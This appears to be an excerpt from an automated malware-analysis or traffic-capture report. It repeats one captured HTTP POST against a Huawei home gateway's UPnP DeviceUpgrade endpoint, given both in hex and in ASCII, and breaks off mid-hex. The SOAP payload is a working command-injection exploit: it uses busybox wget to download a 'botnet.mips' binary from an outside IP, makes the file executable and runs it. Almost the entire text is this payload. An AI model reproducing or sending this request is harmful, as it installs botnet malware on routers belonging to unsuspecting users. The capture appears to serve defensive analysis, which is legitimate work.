6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 